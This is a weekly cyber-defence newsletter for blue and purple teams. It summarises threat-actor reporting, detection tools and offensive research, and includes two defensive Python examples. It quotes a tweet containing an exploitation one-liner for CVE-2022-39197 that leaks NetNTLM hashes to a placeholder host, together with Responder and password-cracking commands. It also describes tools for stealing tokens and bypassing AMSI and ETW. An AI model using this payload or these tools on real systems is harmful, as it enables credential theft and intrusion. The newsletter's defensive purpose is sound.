Cyber Defence Analysis for Blue & Purple Teams

Bluepurple Pulse: week ending September 25th

I got the date right this week.. 🥇 to me...

Ollie
Sep 23, 2022
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.

Operationally, you will see from the below that a lot is happening this week: the Lockbit ransomware builder leak, the arrest of a suspect behind the Uber and Rockstar breaches, plus the sheer volume of reporting below. It all feels a little busy…

In the high-level this week:

  • INTERPOL Working Group highlighted cyber threats across the Americas - summary of a meeting but recognition of the threats faced by South America.

  • Romania bans Russian antivirus software - specialists warn that the presence of Russian anti-virus software represents a vulnerability to the cyber security of the Romanian authorities and institutions. Other countries have done it previously but Romania has now moved on the topic.

  • Delaware Court Of Chancery Dismisses Caremark Claims Alleging Breaches Of Fiduciary Duty Following A Cyberattack - US pension fund tried to litigate for cyber oversight failures which led to a breach. They failed because directors are not liable for “simple negligence” or in most cases, even gross negligence.

  • ‘Assumptions and hypotheticals: Second edition’ which is a discussion piece between various experts covering the following three assumptions

    • Cyber Sovereignty

    • Cyber Attribution

    • Signalling De-escalation

  • Department of Homeland Security (DHS) announced what they describe as a first-of-its-kind cybersecurity grant program specifically for state, local, and territorial (SLT) governments across the USA.

  • White House published Remarks by National Security Advisor Jake Sullivan at the Special Competitive Studies Project Global Emerging Technologies Summit - “Protecting our tech innovation from theft or abuse also requires strong cybersecurity protections.  Through President Biden’s Executive Order on Improving the Nation’s Cybersecurity last year, and subsequent directives, we have taken a wide range of steps necessary to defend our nation from one of the most pressing threats to our economic and national security”.

  • ‘Why NATO Countries Don’t Share Cyber Weapons’ - essay is based on No Shortcuts: Why States Struggle to Develop a Military Cyber-Force, published with Oxford University Press and Hurst Publishers.

  • Untangling the Russian web: Spies, proxies, and spectrums of Russian cyber behaviour - some interesting perspectives/opinions - I will call them that as it isn’t clear what the empirical evidence base is.

  • ‘A Retrospective Post-Quantum Policy Problem’ - I personally think this shows a lack of understanding as it assumes everyone uses RSA.

  • National Academies of Sciences, Engineering and Medicine published a report on ‘Cryptography and the Intelligence Communication -The Future of Encryption’ - now this is interesting - “At the request of the Office of the Director of National Intelligence, this report identifies potential scenarios that would describe the balance between encryption and decryption over the next 10 to 20 years and assesses the national security and intelligence implications of each scenario.”

  • The White House released their ‘Technical Evaluation For A U.S. Central Bank Digital Currency System’ - you can see we are inching to a world with a digital dollar.

    • Also related was ‘White House Releases First-Ever Comprehensive Framework for Responsible Development of Digital Assets’

  • The US’s NIST published their ‘AI Risk Management Framework’

    • Relatedly, the Czech Presidency put forward a narrower classification of high-risk systems as part of the AI Act.

  • Stanford’s Cyber Policy Centre is running their fall seminar series featuring a variety of speakers who will discuss work and research on the intersection of free speech, democracy, security, and digital communication technologies

In the land of interesting jobs:

  • The Atlantic Council is looking for an ‘Associate Director, Cyber Statecraft Initiative’; the role is remote.

  • The Royal Danish Defence College is hiring an assistant/associate professor on cybersecurity

Finally, the travesty of the week was that Lockbit allegedly paid $50,000 to the reporter of a crypto flaw in their ESXi variant which enabled decryption. When our adversaries adopt bug-bounty-style rewards, the world has arrived at an odd place.

Reflection this week is around the capital being invested in technology and its implications. It is an amazing time to be a technologist when foundations are dropping $200 million investments in quantum computing for life sciences, or when NIST and Google sign cooperative research and development agreements to develop and produce chips that researchers can use to build new nanotechnology and semiconductor devices.

It is clear that computing, and with it our world, is going to change quite radically in the next 10 years.

Have a lovely Friday

Ollie

Cyber threat intelligence

Who is doing what to whom and how.

Ukraine

Russia-Nexus UAC-0113 Emulating Telecommunication Providers in Ukraine

Reporting on Russia activity using websites with JavaScript to facilitate ISO file delivery.

This report profiles the unique infrastructure used by the threat activity group UAC-0113, which is linked with moderate confidence by CERT-UA to Sandworm. The activity was identified through a combination of large-scale automated network traffic analytics and analysis derived from open source reporting. The report will be of most interest to individuals engaged in strategic and operational intelligence relating to the activities of the Russian government in cyberspace and network defenders.

https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine

GRU: Rise of the (Telegram) MinIOns

Russian information operations and loose links to DDoS capability. The actual tradecraft reporting is a little light; it is included more for awareness.

  • [We are] tracking multiple self-proclaimed hacktivist groups working in support of Russian interests. These groups have primarily conducted distributed denial-of-service (DDoS) attacks and leaked stolen data from victim organizations. Although some of these actors are almost certainly operating independently of the Russian state, we have identified multiple so-called hacktivist groups whose moderators we suspect are either a front for, or operating in coordination with, the Russian state.

  • We assess with moderate confidence that moderators of the purported hacktivist Telegram channels “XakNet Team,” “Infoccentr,” and “CyberArmyofRussia_Reborn” are coordinating their operations with Russian Main Intelligence Directorate (GRU)-sponsored cyber threat actors. Our assessment is based in part on the deployment of GRU-sponsored APT28 tools on the networks of Ukrainian victims, whose data was subsequently leaked on Telegram within 24 hours of wiping activity by APT28, as well as other indicators of inauthentic activity by the moderators and similarities to previous GRU information operations.

https://www.mandiant.com/resources/blog/gru-rise-telegram-minions

MustangPanda – Enemy At The Gate

Vietnamese reporting on Chinese activity which appears to overlap with campaigns in Ukraine and Europe.

In the second quarter of 2022, while hunting on VirusTotal’s platform, performing a search for specific byte patterns related to the Mustang Panda (#PlugX) group, I discovered a series of samples that we suspect to be of this group was uploaded from Vietnam. Parallel to the campaign that is believed to attack Vietnam, is a series of other campaigns of this group targeting events related to the European Union, the armed conflict that took place in Ukraine, events in countries like Montenegro, Bosnia and Herzegovina,…

Covering the hunting process as well as analyzing in depth the techniques that the Mustang Panda group applied to infect the victim’s machine, which is then used as a springboard to conduct espionage activities and information theft.

https://kienmanowar.wordpress.com/2022/09/20/mustangpanda-enemy-at-the-gate/

https://github.com/m4now4r/Presentations/blob/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf

New phishing campaign targets GitHub users

Worth noting that domain doppelgangers are tradecraft we saw in the Okta attacks too. If you aren’t monitoring for the registration of such look-alike domains, you likely should be.

Reminder https://github.com/nccgroup/typofinder can help here.

On September 16, GitHub Security learned that threat actors were targeting GitHub users with a phishing campaign by impersonating CircleCI to harvest user credentials and two-factor codes. While GitHub itself was not affected, the campaign has impacted many victim organizations. Today, we are sharing details of what we’ve learned to help raise awareness of this phishing campaign and protect potential future victims.

https://github.blog/2022-09-21-security-alert-new-phishing-campaign-targets-github-users/

7 Years of Scarlet Mimic’s Mobile Surveillance Campaign Targeting Uyghurs

An Android mobile campaign from China which is still active. Interesting insights into their capability evolution and also the fact that mobile social engineering obviously works for them.

In 2022, [we] observed a new wave of a long-standing campaign targeting the Uyghur community, a Turkic ethnic group originating from Central Asia, one of the largest minority ethnic groups in China. This malicious activity, which we attributed to the threat actor Scarlet Mimic, was first brought to light back in 2016.

[We have] identified more than 20 samples of Android spyware called MobileOrder, with the latest variant dated mid-August 2022. As there are no indications that any of them were distributed from the Google Store, we can assume the malware is distributed by other means, most likely by social engineering campaigns.

https://research.checkpoint.com/2022/never-truly-left-7-years-of-scarlet-mimics-mobile-surveillance-campaign-targeting-uyghurs/

Chinese State-Sponsored Group TA413 Adopts New Capabilities in Pursuit of Tibetan Targets

Further Chinese activity, with the following of note: the Royal Road RTF weaponizer tool is used to exploit vulnerabilities in Microsoft Equation Editor (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802) and to build the maldocs. These files are then hosted on the Google Firebase service, which potentially complicates detection and blocking at the network level.

This report details multiple campaigns conducted by the likely Chinese state-sponsored threat activity group TA413. The activity was identified through a combination of large-scale automated network traffic analytics and expert analysis. This report will be of most interest to individuals and organizations with strategic and operational intelligence requirements relating to Chinese cyber threat activity, as well as humanitarian and other organizations concerned with Tibetan interests. With thanks to our colleagues at Sophos for early sharing and collaboration.

https://www.recordedfuture.com/chinese-state-sponsored-group-ta413-adopts-new-capabilities-in-pursuit-of-tibetan-targets

The Mystery of Metador | An Unattributed Threat Hiding in Telcos, ISPs, and Universities

Juan Andrés Guerrero-Saade once again shows why he is top of his game by outing this unattributed threat actor. A new player has apparently stepped on to the pitch going after telecommunications infrastructure. A few sloppy opsec mistakes however may end up being their undoing once the community warms up.

  • [Our] researchers uncovered a never-before-seen advanced threat actor we’ve dubbed ‘Metador’.

  • Metador primarily targets telecommunications, internet service providers, and universities in several countries in the Middle East and Africa.

  • The operators are highly aware of operations security, managing carefully segmented infrastructure per victim, and quickly deploying intricate countermeasures in the presence of security solutions.

  • Metador’s attack chains are designed to bypass native security solutions while deploying malware platforms directly into memory. [Our] researchers discovered variants of two long-standing Windows malware platforms, and indications of an additional Linux implant.

  • At this time, there’s no clear, reliable sense of attribution. Traces point to multiple developers and operators that speak both English and Spanish, alongside varied cultural references including British pop punk lyrics and Argentinian political cartoons.

https://www.sentinelone.com/labs/the-mystery-of-metador-an-unattributed-threat-hiding-in-telcos-isps-and-universities/

Analysis Report on Lazarus Group's Rootkit Attack Using BYOVD

We have reported on the increasing use of this technique by a variety of actors. Interesting that vendors are responding with detections because of it (see later). This reporting covers the Hermit Kingdom’s use of what would once have been thought of as a sophisticated capability reserved for the likes of Russia.

The rootkit malware identified in the recent product-disabling attack abused vulnerable driver kernel modules to directly read and write to the kernel memory area and accordingly, all monitoring systems inside the system including AV (Anti-Virus) were disabled.

This technique is called the “BYOVD (Bring Your Own Vulnerable Driver)” method and is known to be performed mainly on vulnerable driver modules of hardware supply companies. With the latest Windows OS, unsigned drivers can no longer be loaded; however, attackers can use such legally-signed vulnerable drivers to control the kernel area easily.

The vulnerable driver module used by the Lazarus Group, in this case, was a hardware-related module manufactured by “ENE Technology”.

https://asec.ahnlab.com/en/38993/

FBI/CISA: Iranian State Actors Conduct Cyber Operations Against the Government of Albania

Following on from last week’s full-court press against Iran from the Five Eyes, this week we get details of the Albanian operation. The most informative aspect is that we learn initial access was via Microsoft SharePoint, exploiting CVE-2019-0604.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks.

https://www.cisa.gov/uscert/sites/default/files/publications/aa22-264a-iranian-cyber-actors-conduct-cyber-operations-against-the-government-of-albania.pdf

NSA, CISA: How Cyber Actors Compromise OT/ICS and How to Defend Against It

Press release:

The National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) published a Cybersecurity Advisory today that highlights the steps malicious actors have commonly followed to compromise operational technology (OT)/industrial control system (ICS) assets and provides recommendations on how to defend against them.

https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3167259/nsa-cisa-how-cyber-actors-compromise-otics-and-how-to-defend-against-it/

Advisory:

This joint Cybersecurity Advisory, which builds on previous NSA and CISA guidance to stop malicious ICS activity and reduce OT exposure, describes TTPs that malicious actors use to compromise OT/ICS assets. It also recommends mitigations that owners and operators can use to defend their systems. NSA and CISA encourage OT/ICS owners and operators to apply the recommendations in this CSA.

https://media.defense.gov/2022/Sep/22/2003083007/-1/-1/0/CSA_ICS_Know_the_Opponent_.PDF

Void Balaur | The Sprawling Infrastructure of a Careless Mercenary

Tom Hegel further details an actor with transparent pricing, more transparent in fact than most cyber vendors. The point of note here is the clear hack-for-hire nature of the operation: where innovation happens, others follow.

  • The cyber mercenary group known as Void Balaur continues to expand their hack-for-hire campaigns into 2022, unfazed by disruptions to their online advertising personas.

  • New targets include a wide variety of industries, often with particular business or political interests tied to Russia. Void Balaur also goes after targets valuable for prepositioning or facilitating future attacks. Their targets span the United States, Russia, Ukraine, and various other countries.

  • Attacks are often very generic in theme, may appear opportunistic in nature, and account for targets making use of multi-factor authentication. The group seeks access to well-known email services (Gmail, Outlook, Yahoo), social media (Facebook, Instagram), messaging (Telegram), and corporate accounts.

  • A unique and short-lived connection links Void Balaur’s infrastructure to the Russian Federal Protective Service (FSO), a low-confidence indication of a potential customer relationship or resource sharing between the two.

https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/

Threat Actors Continue to Abuse Google Tag Manager for Payment Card e-Skimming

The scale of the active operation is the thing of note, but also interesting that 569 domains infected only yielded 165,000 records. These must be tiny small-medium-enterprises, which compounds the issue.

  • As of this writing, all 3 GTM-based e-skimmer variants are currently being used to infect e-commerce domains and compromise customers’ payment card data.

  • We identified 569 e-commerce domains infected with e-skimmers: 314 were confirmed to have been infected by a GTM-based e-skimmer variant, whereas the remaining 255 had infections that exfiltrated stolen data to malicious domains associated with GTM abuse.

https://www.recordedfuture.com/threat-actors-continue-to-abuse-google-tag-manager-for-payment-card-e-skimming

PrivateLoader: the loader of the prevalent ruzki PPI service

Point of note here is that installs are sold in bundles of thousands. This shows how confident they are in being able to get down onto endpoints even with all the modern security practices in place.

The threat actor ruzki (aka les0k, zhigalsz) has advertised their PPI service on underground Russian-speaking forums and their Telegram channels under the name ruzki or zhigalsz since at least May 2021. Their business model consists in selling bundles of a thousand installations, located on systems all over the world, or specifically in Europe or in the United States.

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

New Malware in the Cloud By TeamTNT

Assaf Morag details a really interesting and novel campaign which is apparently using the compromised compute to attack the cryptography used in Bitcoin. If proven, this is an interesting evolution and shows a degree of understanding. It will also be interesting to see whether it works.

The Pollard’s Kangaroo interval ECDLP solver algorithm appears to be an attempt to break the SECP256K1 encryption which is used by Bitcoin to implement its public key cryptography.

https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt

Fake Telegram site delivering RAT aimed at Chinese Users

Point of note is the Windows Defender side loading tradecraft which we have covered previously being used by an actor active in China.

[We] identified a fake Telegram website masquerading as a legitimate website that downloads a malicious installer. This installer abuses the Windows Defender application to perform RAT operations. The below figure shows the fake Telegram website.

Upon executing the MSI file, it performs DLL side-loading using a genuine MpCmdRun.exe file and sideloads a malicious file mpclient.dll. The MpCmdRun.exe is a Windows defender component that usually loads a legitimate file mpclient.dll. In this case, the Threat Actor has replaced the legitimate mpclient.dll with a malicious file.

The loaded malicious DLL file further reads a file named upgrade.xml, decrypts it, and injects the code into %WINDIR%\System32\odbca32.exe to evade detection

https://blog.cyble.com/2022/09/17/fake-telegram-site-delivering-rat-aimed-at-chinese-users/
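As an added defender-side illustration of the side-loading chain in the Cyble item above (this is not code from the Cyble post or from the campaign itself): a small Python check over Sysmon-style image-load records that flags MpCmdRun.exe loading an mpclient.dll that is unsigned, not Microsoft-signed, or sitting outside the Windows Defender install directories. The trusted-directory list, the expected signer string and every sample event are assumptions constructed for this example.

```python
"""Flag MpCmdRun.exe side-loading a look-alike mpclient.dll from image-load telemetry."""
import ntpath
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Directories from which Windows Defender normally runs MpCmdRun.exe and loads
# mpclient.dll. Assumption for this example: tune to the platform versions you see.
TRUSTED_DEFENDER_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)
EXPECTED_SIGNER = "microsoft windows"  # assumed signer name as your sensor reports it


@dataclass
class ImageLoadEvent:
    """Subset of a Sysmon Event ID 7 (image load) record, normalised for the check."""
    host: str
    image: str         # process that performed the load
    image_loaded: str  # DLL that was mapped into it
    signed: bool
    signer: str


def _norm(path: str) -> str:
    return path.strip().lower()


def _in_trusted_dir(path: str) -> bool:
    """True when the file's directory is one of the Defender directories or below one."""
    directory = ntpath.dirname(_norm(path))
    return any(directory == d or directory.startswith(d + "\\") for d in TRUSTED_DEFENDER_DIRS)


def classify(ev: ImageLoadEvent) -> Optional[str]:
    """Return a reason string when the event looks like mpclient.dll side-loading, else None."""
    if ntpath.basename(_norm(ev.image)) != "mpcmdrun.exe":
        return None
    if ntpath.basename(_norm(ev.image_loaded)) != "mpclient.dll":
        return None
    reasons = []
    if not _in_trusted_dir(ev.image):
        reasons.append("MpCmdRun.exe running outside Defender directories")
    if not _in_trusted_dir(ev.image_loaded):
        reasons.append("mpclient.dll loaded from outside Defender directories")
    if not ev.signed or _norm(ev.signer) != EXPECTED_SIGNER:
        reasons.append("mpclient.dll not signed by Microsoft")
    return "; ".join(reasons) if reasons else None


def scan(events: Iterable[ImageLoadEvent]) -> List[Tuple[str, str, str]]:
    """Return (host, dll path, reason) for every event that classify() flags."""
    findings = []
    for ev in events:
        reason = classify(ev)
        if reason:
            findings.append((ev.host, ev.image_loaded, reason))
    return findings


# Constructed sample telemetry (not real data; version strings are made up):
# a benign load, a copied Defender binary side-loading an unsigned DLL from a
# user-writable path, an unrelated process, a legitimate Platform-directory load,
# and a DLL in the right place but carrying a non-Microsoft signature.
SAMPLE_EVENTS = [
    ImageLoadEvent("ws01", r"C:\Program Files\Windows Defender\MpCmdRun.exe",
                   r"C:\Program Files\Windows Defender\mpclient.dll", True, "Microsoft Windows"),
    ImageLoadEvent("ws02", r"C:\Users\alice\AppData\Local\Temp\Telegram\MpCmdRun.exe",
                   r"C:\Users\alice\AppData\Local\Temp\Telegram\mpclient.dll", False, ""),
    ImageLoadEvent("ws03", r"C:\Windows\System32\svchost.exe",
                   r"C:\Windows\System32\ntdll.dll", True, "Microsoft Windows"),
    ImageLoadEvent("ws04", r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0000.0-0\MpCmdRun.exe",
                   r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0000.0-0\mpclient.dll",
                   True, "Microsoft Windows"),
    ImageLoadEvent("ws05", r"C:\Program Files\Windows Defender\MpCmdRun.exe",
                   r"C:\Program Files\Windows Defender\mpclient.dll", True, "Example Software Ltd"),
]

if __name__ == "__main__":
    for host, dll, reason in scan(SAMPLE_EVENTS):
        print(f"{host}: {dll} -> {reason}")
```

The same three checks (unexpected parent directory, unexpected DLL directory, unexpected signer) generalise to any signed-binary side-loading pair once you know the binary's legitimate install locations.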

NetSupport RAT Distributed via SocGholish

Commercial tool being deployed by criminals for remote access in an attempt to avoid being flagged by endpoint detection. You have to wonder how much extra dual use we will see as endpoint protection improves.

SocGholish is a JavaScript malware framework that has been active since 2017. The term “Soc” in “SocGholish” refers to the use of social engineering toolkits masquerading as software updates to deploy malware on a victim’s system.

This malware framework uses several social engineering themes that impersonate browser and program updates such as Chrome/Firefox, Flash Player, and Microsoft Teams.

Threat Actors (TAs) host a malicious website (the site displays content to lure end-users with critical browser updates) that implements a drive-by-download mechanism, such as JavaScript code or Uniform Resource Locator (URL) redirections, to download an archive file that contains malware.

https://blog.cyble.com/2022/09/21/netsupport-rat-distributed-via-socgholish/

Raspberry Robin’s Roshtyak: A Little Lesson in Trickery

Jan Vojtěšek provides some excellent analysis but also quantification of infection scale. The fact they managed to achieve over half a million deployments through infected removable drives is a thing of wonder.

[A] backdoor we dubbed Roshtyak, is not your typical piece of malware. Roshtyak is full of tricks. Some are well-known, and some we have never seen before. From a technical perspective, the lengths Roshtyak takes to protect itself are extremely interesting. Roshtyak belongs to one of the best-protected malware strains we have ever seen.

Roshtyak is the DLL backdoor used by Raspberry Robin, a worm spreading through infected removable drives. Raspberry Robin is extremely prevalent. We protected over 550K of our users from the worm this year.

https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/

FIN11 is Back : Impersonates Popular Video Conference Application Zoom

Two bits of reporting on the same campaign this week by FIN11. Interesting point is domain doppelgangers once again.

https://www.cyfirma.com/outofband/fin11-is-back-impersonates-popular-video-conference-application/

https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/

Discovery

How we find and understand the latent compromises within our environments.

VeloCon 2022

10 videos from the conference about Velociraptor

https://www.youtube.com/playlist?list=PLz4xB83Y3VbhJjsvw75wPbNZcbiWA_L03

Detecting LSASS dumping with debug privileges

Olaf Hartong shows that defence research even into really common tradecraft has value. He shows how there are detection opportunities still waiting to be discovered.

There are several other methods of dumping credentials from the LSASS process, or carving it out live. A lot of them are (partially) detected out of the box, but still a substantial number are not. This detection only covers a specific implementation of the credential dumping technique.

https://medium.com/falconforce/falconfriday-detecting-lsass-dumping-with-debug-privileges-0xff1f-328fdb78f5be

Varc - Volatile Artifact Collector

Chris Doman and Adam Cohen Hillel release this capability to support incident response teams.

varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.

It creates a zip, which contains a number of different pieces of data to understand what is happening on a system:

  • JSON files e.g. running processes and what network connections they are making

  • Memory of running processes, on a per-process basis. This is also carved to extract log and text data from memory

  • Netstat data of active connections

  • The contents of open files, for example running binaries

We have successfully executed it across:

  • Windows

  • Linux

  • OSX

  • Cloud environments such as AWS EC2

  • Containerised Docker/Kubernetes environments such as AWS ECS/EKS/Fargate and Azure AKS

  • Even serverless environments such as AWS Lambda

https://github.com/cado-security/varc

How to Detect and Prevent impacket's Wmiexec

Stephan Wolfert again shows that detection research has value.

  • Impacket, an open source collection of Python modules for manipulating network protocols, contains several tools for remote service execution, Windows credential dumping, packet sniffing and Kerberos manipulation.

  • [We have] seen an increased use of Impacket’s wmiexec module, primarily by ransomware and eCrime groups.

  • Wmiexec leaves behind valuable forensic artifacts that will help defenders detect its usage and identify evidence or indication of adversary activity.

https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/

Velociraptor 0.6.6 Release

New release as their deployments scale.

Multi-tenant mode, password changes within the GUI and improvements to the process tracker make this a big update for power Velociraptor users.

https://docs.velociraptor.app/blog/2022/2022-08-15-release-notes/

MISP 2.4.162 Release

New release from the team.

As of version 2.4.162, MISP includes a periodic summary feature allowing users to consult a summary based on a requested time-frame for data the user has access to.

Currently, the summaries can be generated for 3 different periods: daily, weekly and monthly and then sent to all users that subscribed to one of these periods.

https://www.misp-project.org/2022/09/13/MISP.2.4.162.released.html/

Defence

How we proactively defend our environments.

A Guide to Improving Security Through Infrastructure-as-Code

Viktor Gazdag from NCC Group provides an extensive guide on how to improve security through IaC. With over 80 third-party references, this is a must-read for anyone looking at how to automate security in an Infrastructure as Code world.

The good news is that there is a lot of information and tooling available today for anyone who would like to automatically deploy infrastructure resources with built-in security in the cloud by developing secure infrastructure as code. This article attempts to collect the main starting points, creating a guide on how to integrate security into infrastructure as code and showing how these security checks and gates, tools and procedures secure the infrastructure, mentioning free and/or open-source tools wherever possible.

https://research.nccgroup.com/2022/09/19/a-guide-to-improving-security-through-infrastructure-as-code/

Stopping Vulnerable Driver Attacks

Joe Desimone shows how they have added 'first seen' to detect bring your own vulnerable driver style attacks.

Elastic Security in 8.4 adds another powerful tool that can be used to identify suspicious drivers. This is the “New Terms” rule type, which can be used to create an alert when a term (driver hash, signer, version, internal file name, etc) is observed for the first time.

This empowers security teams to quickly surface unusual drivers the first time they’re seen in their environment. This supports a detection opportunity for even previously unknown vulnerable drivers or other driver-based adversary tradecraft.

https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks

How to kick off an investigation for a compromised SaaS account

Johann Scheepers from PushSecurity outlines how to run an investigation end to end following an illicit OAuth consent grant in Microsoft Office 365.

While the process isn’t exactly straightforward, catching early indicators like malicious mail rules helps you prevent an attacker from launching additional attacks like phishing campaigns as they try to gain access to sensitive business data. Removing the mail rule is just the start of the process, you really need to revoke permissions and take the other steps we covered in this post to stop an attack from going any further.

https://pushsecurity.com/blog/how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas/

SOC tasks in Microsoft Sentinel

Daniel Chronlund provides a useful collection of information on how to run a Sentinel SOC in terms of regular tasking.

The official Microsoft recommendations (and some of the author’s own) for daily, weekly, and monthly SOC activities.

https://danielchronlund.com/2022/09/21/microsoft-sentinel-soc-activities/

Open Cybersecurity Schema Framework

We have too many schemas, what we need is... another schema

The Open Cybersecurity Schema Framework is an open-source project delivering an extensible framework for developing schemas, along with a vendor-agnostic core security schema. Vendors and other data producers can adopt and extend the schema for their specific domains. Data engineers can map differing schemas to help security teams simplify data ingestion and normalization, so that data scientists and analysts can work with a common language for threat detection and investigation. The goal is to provide an open standard, adopted in any environment, application, or solution, while complementing existing security standards and processes.

https://github.com/ocsf

Active Directory integration features in Ubuntu 22.04

This is going to be either great or a spectrum of tyre 🔥 for cyber defence, as it allows the deployment of Group Policy Objects to Linux hosts.

https://ubuntu.com/engage/New-Active-Directory-integration-features

Implemented via this client:

https://github.com/ubuntu/adsys

Micro Emulation Plans

From the Center for Threat Informed Defense.

This collection expands the impact of the Adversary Emulation Library by developing easy-to-execute adversary emulation content that targets specific behaviours and challenges facing defenders

https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/v4.0/micro_emulation_plans

Vulnerability

Our attack surface.

Aruba ClearPass Policy Manager, Multiple Vulnerabilities

Escalation of privilege; remote arbitrary command execution, cross-site request forgery (CSRF), denial of service (DoS) and SQL injection. The ClearPass Policy Manager platform provides role-based and device-based network access control.

https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbnw04362en_us

Cobalt Strike 4.7.1

Closes a detection technique for sleepmask and addresses an XSS in TeamServer

https://www.cobaltstrike.com/blog/out-of-band-update-cobalt-strike-4-7-1/

Exploitation was then shown here:

Tweet from Jas502n (@jas502n), Sep 23, 2022:

#CVE-2022-39197 Cobalt Strike <html>< img src='file://x.x.x.x/netntlm2'%> python3 Responder.py -I eth0 john --format=netntlmv2 --wordlist=pass.txt creds.txt

Offense

Attack capability, techniques and tradecraft.

How we Abused Repository Webhooks to Access Internal CI Systems at Scale

Novel attack surface exploited by Omer Gil and Asi Greenholts which I suspect will be difficult for Attack Surface Management vendors to respond to.

Organizations take multiple measures to protect and limit access to self-hosted CI systems, with the IP restriction of the SaaS SCM vendors’ webhook services being one of these measures. However, as we demonstrated in this blog, this measure creates a false sense of security as any internet originating attacker can leverage SCM webhook infrastructure to send traffic towards internal CI systems and conduct malicious activities which range from obtaining valid CI credentials to running exploits and fully compromising the CI.

https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/
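The control the post describes as insufficient is an IP allow-list for the SCM vendor's webhook egress. The complementary check, as an added example that is not code from the Cider Security post or from any SCM vendor, is to verify each delivery's HMAC against the organisation's own hook secret; it assumes the GitHub-style scheme (HMAC-SHA256 over the raw body, sent as `X-Hub-Signature-256: sha256=<hex>`), and the secret, bodies and headers below are constructed.

```python
import hmac
import hashlib

# Constructed secret for the example; in practice it is generated per hook
# and read from the CI server's secret store, never committed to source.
HOOK_SECRET = b"constructed-example-secret"


def sign_body(secret: bytes, body: bytes) -> str:
    """Build the header value the SCM sends for `body` under `secret`."""
    digest = hmac.new(secret, body, hashlib.sha256).hexdigest()
    return "sha256=" + digest


def verify_webhook(secret: bytes, headers: dict, body: bytes) -> bool:
    """True only if `body` carries a valid signature under our `secret`.

    A request from the SCM's own IP range but signed with some other
    secret (a hook the attacker registered on a repo they control) fails
    here even though an IP allow-list would have let it through.
    """
    received = headers.get("X-Hub-Signature-256", "")
    if not received.startswith("sha256="):
        return False  # unsigned or differently formatted: reject outright
    expected = sign_body(secret, body)
    # Constant-time comparison so a forged header leaks nothing via timing.
    return hmac.compare_digest(received, expected)


# Constructed sample deliveries: the same push body as delivered by the
# organisation's hook, by a hook signed with a secret we do not know, and
# with no signature at all.
PUSH_BODY = b'{"ref":"refs/heads/main","repository":{"full_name":"org/app"}}'
LEGIT_HEADERS = {"X-Hub-Signature-256": sign_body(HOOK_SECRET, PUSH_BODY)}
ROGUE_HEADERS = {"X-Hub-Signature-256": sign_body(b"other-secret", PUSH_BODY)}


def demo() -> tuple:
    """Return (legit accepted, rogue rejected, unsigned rejected)."""
    return (
        verify_webhook(HOOK_SECRET, LEGIT_HEADERS, PUSH_BODY),
        not verify_webhook(HOOK_SECRET, ROGUE_HEADERS, PUSH_BODY),
        not verify_webhook(HOOK_SECRET, {}, PUSH_BODY),
    )


if __name__ == "__main__":
    print(demo())  # (True, True, True)
```

The same check also catches a replayed body whose bytes were altered in transit, since the HMAC covers the raw body rather than any parsed form.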

Bypassing FileBlockExecutable in Sysmon 14.0: A Lesson In Analyzing Assumptions

Denis Nagayuk & Francisco Dominguez identify some gaps in Sysmon’s coverage. We can expect Microsoft to fix some of these.

Recently (in August of 2022), the Sysinternals team released Sysmon 14.0 – a notable update of a powerful and configurable tool for monitoring Windows machines. While Sysmon already included a few valuable detection capabilities, the update introduced the first preventive measure – the FileBlockExecutable event (ID 27). This functionality targets malware that uses multi-stage deployment that drops executable files on disk. Sysmon detects, logs, and automatically deletes such files whenever they satisfy certain conditions.

https://www.huntandhackett.com/blog/bypassing-sysmon

Teamsniper

A tool to automate the finding of the goods.

Teamsniper is a tool for fetching keywords (such as passwords, emails, database, etc.) in Microsoft Teams.

https://github.com/xRET2pwn/Teamsniper

Stealing Access Tokens From Office Desktop Applications

More capability subverting the need for passwords.

While I was reading the recent article about how Microsoft Teams stores access tokens in plaintext, I asked myself if this issue extended to other Office applications. I knew that this should be somehow possible because Office applications are generally connected to a Microsoft account.

Update: This seems to only work against Desktop applications that are a part of a Microsoft 365 plan which is generally used by organizations.

https://mrd0x.com/stealing-tokens-from-office-applications/

Masquerading PEB

Capability that makes detection by EDR more challenging and will likely also cause some real headaches in incident response and/or telemetry analysis.

Masquerade any legitimate Windows binary by changing some fields in the PEB structure

https://github.com/D1rkMtr/MasqueradingPEB

Relaying YubiKeys

Some neat work on passing around the second factor, should you have an implant down on the right host.

We are not relaying actual physical YubiKeys; we are relaying the APDU packets that the server application wants signed by a private key to verify the identity of the authentication, so this attack works on all PIV smart cards. A YubiKey was used during the testing, hence the title.

https://cube0x0.github.io/Relaying-YubiKeys/

Exec Remote Assembly with AMSI and ETW patching

Designed to download and run payloads whilst disabling various detections. Detection of the execution cradle itself is the best, though potentially high false positive, strategy.

https://github.com/D1rkMtr/ExecRemoteAssembly

Recreating an MSI Payload for Fun and no profit - as used by Gwisin Ransomware

Sunggwan Choi recreates this capability to help with validating detections work as intended.

